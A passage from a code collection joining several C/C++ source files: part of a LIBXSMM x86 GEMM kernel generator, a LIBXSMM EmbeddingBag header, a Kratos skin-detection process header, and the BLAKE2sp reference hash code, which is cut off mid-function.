'y',
0, 0, 0, 1 );
}
}
}
/* clean up the stack: pop the four helper constants (gp_reg_help_2 is just a scratch target) */
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
libxsmm_x86_instruction_pop_reg( io_generated_code, i_gp_reg_mapping->gp_reg_help_2 );
} else if ( ( (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) && (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CPX) ) &&
( (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* storing downconverted and rounded C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
unsigned int l_m_2_blocking = (l_m_blocking/2)*2;
l_m = 0;
if ( i_micro_kernel_config->use_masking_a_c != 0 ) {
for ( l_m = 0 ; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTNEPS2BF16,
i_micro_kernel_config->vector_name,
reg_X, LIBXSMM_X86_VEC_REG_UNDEF,
0,
0);
/* store 16 bit values into ymm portion of the register */
if ( l_m == (l_m_blocking - 1) ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMOVDQU16,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 2, 0, 1 );
} else {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 0, 1 );
}
}
} else {
for (; l_m < l_m_2_blocking; l_m+=2 ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
unsigned int reg_X2 = l_vec_reg_acc_start + l_m+1 + (l_m_blocking * l_n);
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTNE2PS2BF16,
i_micro_kernel_config->vector_name,
reg_X, reg_X2,
0,
0);
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'z',
0, 0, 0, 1 );
}
for (; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTNEPS2BF16,
i_micro_kernel_config->vector_name,
reg_X, LIBXSMM_X86_VEC_REG_UNDEF,
0,
0);
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/2),
'y',
0, 0, 0, 1 );
}
}
}
} else if ( ( (i_micro_kernel_config->instruction_set <= LIBXSMM_X86_ALLFEAT) && (i_micro_kernel_config->instruction_set >= LIBXSMM_X86_AVX512_CORE) ) &&
( (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && (LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) ) {
/* pick the right instructions */
unsigned int inst_f32_i32 = ( ( i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_C_UNSIGNED ) != 0 ) ? LIBXSMM_X86_INSTR_VCVTPS2UDQ : LIBXSMM_X86_INSTR_VCVTPS2DQ;
unsigned int inst_i32_i8 = ( ( i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_C_UNSIGNED ) != 0 ) ? LIBXSMM_X86_INSTR_VPMOVUSDB : LIBXSMM_X86_INSTR_VPMOVSDB;
/* there are cases where we need to load the scaling factor's address from the stack argument list */
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_BATCH_REDUCE_OFFSET) != 0 ) {
libxsmm_x86_instruction_load_arg_to_reg( io_generated_code, 0, i_gp_reg_mapping->gp_reg_scf );
}
/* loading scf into register 3 */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VBROADCASTSS,
i_gp_reg_mapping->gp_reg_scf,
LIBXSMM_X86_GP_REG_UNDEF, 0, 0,
i_micro_kernel_config->vector_name,
3, 0, 1, 0 );
/* Zero out register 0 to serve as the ReLU threshold */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
i_micro_kernel_config->vxor_instruction,
i_micro_kernel_config->vector_name,
0,
0,
0);
/* storing downconverted and rounded C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
unsigned int reg_X = l_vec_reg_acc_start + l_m + (l_m_blocking * l_n);
/* Convert result to F32 */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VCVTDQ2PS,
i_micro_kernel_config->vector_name,
reg_X,
LIBXSMM_X86_VEC_REG_UNDEF,
reg_X );
/* Multiply with scaling factor */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMULPS,
i_micro_kernel_config->vector_name,
reg_X,
3,
reg_X );
/* Perform RELU */
libxsmm_x86_instruction_vec_compute_reg( io_generated_code,
i_micro_kernel_config->instruction_set,
LIBXSMM_X86_INSTR_VMAXPS,
i_micro_kernel_config->vector_name,
reg_X,
0,
reg_X);
/* Round result to int32 */
libxsmm_x86_instruction_vec_compute_convert( io_generated_code,
i_micro_kernel_config->instruction_set,
inst_f32_i32,
i_micro_kernel_config->vector_name,
reg_X,
LIBXSMM_X86_VEC_REG_UNDEF,
reg_X,
0);
/* down-convert to int8 */
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
inst_i32_i8,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size/4),
i_micro_kernel_config->vector_name,
reg_X, ( ( l_m == (l_m_blocking - 1)) && ( i_micro_kernel_config->use_masking_a_c != 0 ) ) ? 2 : 0, 0, 1 );
}
}
} else {
/* storing C accumulator */
for ( l_n = 0; l_n < i_n_blocking; l_n++ ) {
for ( l_m = 0; l_m < l_m_blocking; l_m++ ) {
libxsmm_x86_instruction_vec_move( io_generated_code,
i_micro_kernel_config->instruction_set,
l_vstore,
i_gp_reg_mapping->gp_reg_c,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size),
i_micro_kernel_config->vector_name,
l_vec_reg_acc_start + l_m + (l_m_blocking * l_n), ( l_m == (l_m_blocking - 1) ) ? i_micro_kernel_config->use_masking_a_c : 0, 0, 1 );
}
if ( i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C ||
i_xgemm_desc->prefetch == LIBXSMM_GEMM_PREFETCH_AL2BL2_VIA_C_AHEAD ) {
if ( (i_xgemm_desc->flags & LIBXSMM_GEMM_FLAG_TRANS_B) == 0 ) {
/* determining how many prefetches we need in M direction as we just need one prefetch per cache line */
unsigned int l_m_advance = 64 / ((i_micro_kernel_config->vector_length) * (i_micro_kernel_config->datatype_size)); /* 64: hardcoded cache line length */
for (l_m = 0; l_m < l_m_blocking; l_m += l_m_advance ) {
libxsmm_x86_instruction_prefetch( io_generated_code,
i_micro_kernel_config->prefetch_instruction,
i_gp_reg_mapping->gp_reg_b_prefetch,
LIBXSMM_X86_GP_REG_UNDEF, 0,
((l_n * i_xgemm_desc->ldc) + (l_m * (i_micro_kernel_config->vector_length))) * (i_micro_kernel_config->datatype_size));
}
}
}
}
}
}
LIBXSMM_API_INTERN
void libxsmm_generator_gemm_initialize_avx512_mask( libxsmm_generated_code* io_generated_code,
const unsigned int i_gp_reg_tmp,
const libxsmm_gemm_descriptor* i_xgemm_desc,
const unsigned int i_mask_count ) {
unsigned int l_mask;
/* init full mask */
if ( LIBXSMM_GEMM_PRECISION_F64 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) {
l_mask = 0xff;
} else {
l_mask = 0xffff;
}
/* shift right by "inverse" remainder */
l_mask = l_mask >> i_mask_count;
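/* e.g. for 16 F32 lanes with i_mask_count == 3, 0xffff >> 3 == 0x1fff,
   i.e. the low 13 lanes remain active in the resulting mask */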
/* move mask to GP register */
libxsmm_x86_instruction_alu_imm( io_generated_code,
LIBXSMM_X86_INSTR_MOVQ,
i_gp_reg_tmp,
l_mask );
if ( ( io_generated_code->arch >= LIBXSMM_X86_AVX512 ) && ( io_generated_code->arch <= LIBXSMM_X86_ALLFEAT ) ) {
libxsmm_x86_instruction_mask_move( io_generated_code,
LIBXSMM_X86_INSTR_KMOVW_GPR_LD,
i_gp_reg_tmp,
LIBXSMM_X86_AVX512_MASK );
if ( ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && ( LIBXSMM_GEMM_PRECISION_BF16 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) {
libxsmm_x86_instruction_mask_move( io_generated_code,
LIBXSMM_X86_INSTR_KMOVD_GPR_LD,
i_gp_reg_tmp,
2 );
} else if ( ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_INP( i_xgemm_desc->datatype ) ) && ( LIBXSMM_GEMM_PRECISION_I8 == LIBXSMM_GETENUM_OUT( i_xgemm_desc->datatype ) ) ) {
libxsmm_x86_instruction_mask_move( io_generated_code,
LIBXSMM_X86_INSTR_KMOVQ_GPR_LD,
i_gp_reg_tmp,
2 );
} else {
/* no additional mask is needed */
}
} else {
/* shouldn't happen */
LIBXSMM_HANDLE_ERROR( io_generated_code, LIBXSMM_ERR_ARCH );
return;
}
}
|
EmbeddingBag.h | /******************************************************************************
* Copyright (c) Intel Corporation - All rights reserved. *
* This file is part of the LIBXSMM library. *
* *
* For information on the license, see the LICENSE file. *
* Further information: https://github.com/libxsmm/libxsmm/ *
* SPDX-License-Identifier: BSD-3-Clause *
******************************************************************************/
/* Dhiraj Kalamkar, Evangelos Georganas (Intel Corp.)
******************************************************************************/
#if defined(USE_LIBXSMM_JIT)
#include <libxsmm.h>
#endif
#include "utils.h"
#include "rtm.h"
template <typename T>
class EmbeddingBagImpl
{
public:
EmbeddingBagImpl(long M, long E) : M(M), E(E)
{
weight_ = (T*)my_malloc((size_t)M * E * sizeof(T), alignment);
#ifdef USE_LIBXSMM_JIT
/* the leading dimension must be set before the element-wise shapes capture it */
_ld = E;
libxsmm_meltw_unary_shape unary_shape_f32 = libxsmm_create_meltw_unary_shape( E, 0, _ld, _ld, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32 );
libxsmm_meltw_unary_shape unary_shape_f16 = libxsmm_create_meltw_unary_shape( E, 0, _ld, _ld, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32 );
libxsmm_meltw_binary_shape binary_shape_f32 = libxsmm_create_meltw_binary_shape( E, 1, _ld, _ld, _ld, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32, LIBXSMM_DATATYPE_F32 );
if (sizeof(T) == 4) {
kernel = libxsmm_dispatch_meltw_unary_v2( LIBXSMM_MELTW_TYPE_UNARY_REDUCE_COLS_IDX_OP_ADD, unary_shape_f32, (sizeof(long) == 8) ? LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_8BYTES : LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_4BYTES );
} else {
kernel = libxsmm_dispatch_meltw_unary_v2( LIBXSMM_MELTW_TYPE_UNARY_REDUCE_COLS_IDX_OP_ADD, unary_shape_f16, (sizeof(long) == 8) ? LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_8BYTES : LIBXSMM_MELTW_FLAG_UNARY_IDX_SIZE_4BYTES );
}
kernel1 = libxsmm_dispatch_meltw_unary_v2( LIBXSMM_MELTW_TYPE_UNARY_REPLICATE_COL_VAR, unary_shape_f32, LIBXSMM_MELTW_FLAG_UNARY_NONE );
kernel2 = libxsmm_dispatch_meltw_binary_v2( LIBXSMM_MELTW_TYPE_BINARY_MULADD, binary_shape_f32, LIBXSMM_MELTW_FLAG_BINARY_BCAST_SCALAR_IN_0 );
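/* kernel: indexed column reduce-add used by forward(); kernel1: replicate-column
   used by backward() to scatter each bag gradient to its rows; kernel2: scalar
   muladd (weight += lr * grad) used by update(). */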
#endif
}
~EmbeddingBagImpl()
{
my_free(weight_);
weight_ = 0;
}
void init(T low = -0.1, T high = 0.1)
{
init_random(M * E, weight_, low, high);
}
#ifdef USE_LIBXSMM_JIT
void forward(long N, long NS, const long *offsets, const long *indices, T *output_)
{
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict output)[E] = (T(*)[*])output_;
#pragma omp parallel for
for (int n = 0; n < N; n++)
{
libxsmm_meltw_unary_param params;
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
unsigned long long __n = end-start;
params.in.primary = weight;
params.in.secondary = (void*)&indices[start];
params.in.tertiary = &__n;
params.out.primary = &output[n][0];
kernel( &params );
}
}
#else
void forward(long N, long NS, const long *offsets, const long *indices, T *output_)
{
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict output)[E] = (T(*)[*])output_;
#pragma omp parallel for
for (long n = 0; n < N; n++)
{
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
#pragma omp simd
for (long v = 0; v < E; v++)
output[n][v] = 0;
for (long s = start; s < end; s++)
{
auto ind = indices[s];
#pragma omp simd
for (long v = 0; v < E; v++)
{
output[n][v] += weight[ind][v];
}
}
}
}
#endif
#ifdef USE_LIBXSMM_JIT
void backward(long N, long NS, const T *gradout_, const long *offsets, const long *indices, T *values_)
{
T(*__restrict gradout)[E] = (T(*)[*])gradout_;
T(*__restrict values)[E] = (T(*)[*])values_;
int _ld = E;
#pragma omp parallel for
for (long n = 0; n < N; n++)
{
libxsmm_meltw_unary_param unary_param;
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
unsigned long long _N = end-start;
unary_param.in.primary = (void*)&gradout[n][0];
unary_param.out.primary = (void*)&values[start][0];
unary_param.op.primary = (void*)&_N;
kernel1(&unary_param);
}
}
#else
void backward(long N, long NS, const T *gradout_, const long *offsets, const long *indices, T *values_)
{
T(*__restrict gradout)[E] = (T(*)[*])gradout_;
T(*__restrict values)[E] = (T(*)[*])values_;
#pragma omp parallel for
for (long n = 0; n < N; n++)
{
auto start = offsets[n];
auto end = (n < N - 1 ? offsets[n + 1] : NS);
for (long s = start; s < end; s++)
{
#pragma omp simd
#ifdef STREAMING_WRITES
#pragma vector nontemporal(values)
#endif
for (long v = 0; v < E; v++)
values[s][v] = gradout[n][v];
}
}
}
#endif
#ifdef USE_LIBXSMM_JIT
void update(long NS, const T *grads_, const long *indices, float lr, long M, int use_rtm)
{
int use_lock_free = use_rtm == 0 ? 1: 0;
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict grads)[E] = (T(*)[*])grads_;
int _ld = E;
if(use_lock_free) {
/*printf("Using lock free update\n");*/
int max_thr = omp_get_max_threads();
if(M < max_thr) max_thr = M;
#pragma omp parallel num_threads(max_thr)
{
int tid = omp_get_thread_num();
for(long i = 0; i < NS; i++) {
auto ind = indices[i];
if(ind % max_thr == tid) {
libxsmm_meltw_binary_param binary_param;
binary_param.in0.primary = (void*)&lr;
binary_param.in1.primary = (void*)&grads[i][0];
binary_param.out.primary = (void*)&weight[ind][0];
{
kernel2(&binary_param);
}
}
}
}
} else {
SimpleSpinLock fallBackLock;
#pragma omp parallel for
for (long i = 0; i < NS; i++)
{
libxsmm_meltw_binary_param binary_param;
long ind = indices[i];
binary_param.in0.primary = (void*)&lr;
binary_param.in1.primary = (void*)&grads[i][0];
binary_param.out.primary = (void*)&weight[ind][0];
{
TransactionScope guard(fallBackLock, 100, 0);
kernel2(&binary_param);
}
}
}
}
#else
void update(long NS, const T *grads_, const long *indices, float lr, long M, int use_rtm)
{
T(*__restrict weight)[E] = (T(*)[*])weight_;
T(*__restrict grads)[E] = (T(*)[*])grads_;
int use_lock_free = use_rtm == 0 ? 1: 0;
if(use_lock_free) {
int max_thr = omp_get_max_threads();
if(M < max_thr) max_thr = M;
#pragma omp parallel num_threads(max_thr)
{
int tid = omp_get_thread_num();
for(long i = 0; i < NS; i++) {
auto ind = indices[i];
if(ind % max_thr == tid) {
#pragma omp simd
for (long v = 0; v < E; v++)
weight[ind][v] += lr * grads[i][v];
}
}
}
} else {
SimpleSpinLock fallBackLock;
#pragma omp parallel for
for (long i = 0; i < NS; i++)
{
long ind = indices[i];
{
TransactionScope guard(fallBackLock, 100, 0);
#pragma omp simd
for (long v = 0; v < E; v++)
weight[ind][v] += lr * grads[i][v];
}
}
}
}
#endif
T *weight_;
long M;
long E;
#ifdef USE_LIBXSMM_JIT
int _ld;
libxsmm_meltwfunction_unary kernel;
libxsmm_meltwfunction_unary kernel1;
libxsmm_meltwfunction_binary kernel2;
#endif
};
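/* Illustrative usage sketch (not part of the original header; assumes utils.h
   supplies my_malloc/my_free/init_random and the alignment constant):

     EmbeddingBagImpl<float> bag(1000, 64);      // M = 1000 rows, E = 64 features
     bag.init();
     long offsets[2] = {0, 3};                   // bag 0: indices[0..2], bag 1: indices[3..4]
     long indices[5] = {4, 7, 9, 11, 12};
     float out[2 * 64];
     bag.forward(2, 5, offsets, indices, out);   // N = 2 bags, NS = 5 indices in total
*/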
|
sub_model_part_skin_detection_process.h | // | / |
// ' / __| _` | __| _ \ __|
// . \ | ( | | ( |\__ `
// _|\_\_| \__,_|\__|\___/ ____/
// Multi-Physics
//
// License: BSD License
// Kratos default license: kratos/license.txt
//
// Main authors: Jordi Cotela
//
#if !defined(KRATOS_SUB_MODEL_PART_SKIN_DETECTION_PROCESS_H_INCLUDED)
#define KRATOS_SUB_MODEL_PART_SKIN_DETECTION_PROCESS_H_INCLUDED
// System includes
#include <string>
#include <iostream>
// Project includes
#include "skin_detection_process.h"
namespace Kratos
{
///@addtogroup KratosCore
///@{
///@name Kratos Classes
///@{
/// Create a SubModelPart covering a part of the outside skin of the computation domain where a condition is met.
/** For example, create the outer skin for the part of the domain belonging to a given SubModelPart.
*/
template<SizeType TDim>
class KRATOS_API(KRATOS_CORE) SubModelPartSkinDetectionProcess: public SkinDetectionProcess<TDim>
{
KRATOS_DEFINE_LOCAL_FLAG( NODE_SELECTED );
// Internal class used to select which faces to create.
class FaceSelector
{
public:
KRATOS_CLASS_POINTER_DEFINITION(FaceSelector);
virtual ~FaceSelector() = default;
virtual void Prepare(ModelPart& rMainModelPart) const = 0;
virtual bool IsSelected(const Geometry<Node<3>>::PointsArrayType&) const = 0;
};
// Select faces where all nodes belong to given SubModelPart.
class SelectIfAllNodesOnSubModelPart: public FaceSelector
{
std::string mName;
public:
SelectIfAllNodesOnSubModelPart(const std::string& rName): mName(rName) {}
void Prepare(ModelPart& rMainModelPart) const override
{
ModelPart& r_model_part = rMainModelPart.GetSubModelPart(mName);
auto node_begin = r_model_part.NodesBegin();
const int num_nodes = r_model_part.NumberOfNodes();
#pragma omp parallel for
for (int k = 0; k < num_nodes; k++)
{
(node_begin+k)->Set(SubModelPartSkinDetectionProcess::NODE_SELECTED);
}
}
bool IsSelected(const Geometry<Node<3>>::PointsArrayType& rNodes) const override
{
bool select = true;
for (auto i_node = rNodes.begin(); i_node != rNodes.end(); ++i_node)
{
select &= i_node->Is(SubModelPartSkinDetectionProcess::NODE_SELECTED);
}
return select;
}
};
public:
///@name Type Definitions
///@{
/// Pointer definition of SubModelPartSkinDetectionProcess
KRATOS_CLASS_POINTER_DEFINITION(SubModelPartSkinDetectionProcess);
using typename SkinDetectionProcess<TDim>::HashMapVectorIntType;
using typename SkinDetectionProcess<TDim>::HashMapVectorIntIdsType;
using typename SkinDetectionProcess<TDim>::VectorIndexType;
using ConditionCheckType = bool(const Geometry<Node<3>>::PointsArrayType&);
///@}
///@name Life Cycle
///@{
/// Constructor
SubModelPartSkinDetectionProcess(ModelPart& rModelPart, Parameters Settings);
/// Deleted default constructor.
SubModelPartSkinDetectionProcess() = delete;
/// Deleted copy constructor.
SubModelPartSkinDetectionProcess(SubModelPartSkinDetectionProcess const &rOther) = delete;
/// Destructor.
~SubModelPartSkinDetectionProcess() override = default;
///@}
///@name Operators
///@{
/// Deleted assignment operator.
SubModelPartSkinDetectionProcess &operator=(SubModelPartSkinDetectionProcess const &rOther) = delete;
///@}
///@name Operations
///@{
void Execute() override;
///@}
///@name Input and output
///@{
std::string Info() const override
{
return "SkinDetectionProcess";
}
/// Print information about this object.
void PrintInfo(std::ostream& rOStream) const override
{
rOStream << "SkinDetectionProcess";
}
/// Print object's data.
void PrintData(std::ostream& rOStream) const override
{
}
///@}
protected:
///@name Protected Operations
///@{
void CreateConditions(
ModelPart& rMainModelPart,
ModelPart& rSkinModelPart,
HashMapVectorIntType& rInverseFaceMap,
HashMapVectorIntIdsType& rPropertiesFaceMap,
std::unordered_set<IndexType>& rNodesInTheSkin,
const std::string& rConditionName) const override;
/**
* @brief This method provides the defaults parameters to avoid conflicts between the different constructors
*/
const Parameters GetDefaultParameters() const override;
///@}
private:
///@name Member Variables
///@{
typename FaceSelector::Pointer mpFaceSelector;
///@}
///@name Private Operations
///@{
static bool FaceIsNeeded(const Geometry<Node<3>>::PointsArrayType&)
{
return true;
}
///@}
}; // Class SubModelPartSkinDetectionProcess
///@}
///@name Input and output
///@{
/// input stream function
template<SizeType TDim>
inline std::istream &operator>>(std::istream &rIStream,
SubModelPartSkinDetectionProcess<TDim> &rThis);
/// output stream function
template<SizeType TDim>
inline std::ostream &operator<<(std::ostream &rOStream,
const SubModelPartSkinDetectionProcess<TDim> &rThis)
{
rThis.PrintInfo(rOStream);
rOStream << std::endl;
rThis.PrintData(rOStream);
return rOStream;
}
///@}
///@}
} // namespace Kratos.
#endif // KRATOS_SUB_MODEL_PART_SKIN_DETECTION_PROCESS_H_INCLUDED defined
|
blake2sp-ref.c | /*
BLAKE2 reference source code package - reference C implementations
Written in 2012 by Samuel Neves <sneves@dei.uc.pt>
To the extent possible under law, the author(s) have dedicated all copyright
and related and neighboring rights to this software to the public domain
worldwide. This software is distributed without any warranty.
You should have received a copy of the CC0 Public Domain Dedication along with
this software. If not, see <http://creativecommons.org/publicdomain/zero/1.0/>.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#if defined(_OPENMP)
#include <omp.h>
#endif
#include "blake2.h"
#include "blake2-impl.h"
#define PARALLELISM_DEGREE 8
static inline int blake2sp_init_leaf( blake2s_state *S, uint8_t outlen, uint8_t keylen, uint64_t offset )
{
blake2s_param P[1];
P->digest_length = outlen;
P->key_length = keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store48( P->node_offset, offset );
P->node_depth = 0;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
static inline int blake2sp_init_root( blake2s_state *S, uint8_t outlen, uint8_t keylen )
{
blake2s_param P[1];
P->digest_length = outlen;
P->key_length = keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store48( P->node_offset, 0ULL );
P->node_depth = 1;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
int blake2sp_init( blake2sp_state *S, const uint8_t outlen )
{
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
if( blake2sp_init_root( S->R, outlen, 0 ) < 0 )
return -1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, 0, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
return 0;
}
int blake2sp_init_key( blake2sp_state *S, const uint8_t outlen, const void *key, const uint8_t keylen )
{
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( !key || !keylen || keylen > BLAKE2S_KEYBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
if( blake2sp_init_root( S->R, outlen, keylen ) < 0 )
return -1;
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, keylen, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
return 0;
}
int blake2sp_update( blake2sp_state *S, const uint8_t *in, uint64_t inlen )
{
size_t left = S->buflen;
size_t fill = sizeof( S->buf ) - left;
if( left && inlen >= fill )
{
memcpy( S->buf + left, in, fill );
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, BLAKE2S_BLOCKBYTES );
in += fill;
inlen -= fill;
left = 0;
}
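/* Stripe the remaining input over the leaves: leaf id__ hashes blocks
   id__, id__+8, id__+16, ... (one BLAKE2S_BLOCKBYTES block per stride of
   PARALLELISM_DEGREE blocks), either on its own OpenMP thread or
   sequentially when OpenMP is unavailable. */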
#if defined(_OPENMP)
#pragma omp parallel shared(S), num_threads(PARALLELISM_DEGREE)
#else
for( size_t id__ = 0; id__ < PARALLELISM_DEGREE; ++id__ )
#endif
{
#if defined(_OPENMP)
size_t id__ = omp_get_thread_num();
#endif
uint64_t inlen__ = inlen;
const uint8_t *in__ = ( const uint8_t * )in;
in__ += id__ * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S->S[id__], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
}
in += inlen - inlen % ( PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES );
inlen %= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
if( inlen > 0 )
memcpy( S->buf + left, in, inlen );
S->buflen = left + inlen;
return 0;
}
int blake2sp_final( blake2sp_state *S, uint8_t *out, const uint8_t outlen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
{
if( S->buflen > i * BLAKE2S_BLOCKBYTES )
{
size_t left = S->buflen - i * BLAKE2S_BLOCKBYTES;
if( left > BLAKE2S_BLOCKBYTES ) left = BLAKE2S_BLOCKBYTES;
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, left );
}
blake2s_final( S->S[i], hash[i], BLAKE2S_OUTBYTES );
}
for( size_t i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->R, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( S->R, out, outlen );
}
int blake2sp( uint8_t *out, const void *in, const void *key, uint8_t outlen, uint64_t inlen, uint8_t keylen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
blake2s_state S[PARALLELISM_DEGREE][1];
blake2s_state FS[1];
/* Verify parameters */
if ( NULL == in && inlen > 0 ) return -1;
if ( NULL == out ) return -1;
if ( NULL == key && keylen > 0) return -1;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( keylen > BLAKE2S_KEYBYTES ) return -1;
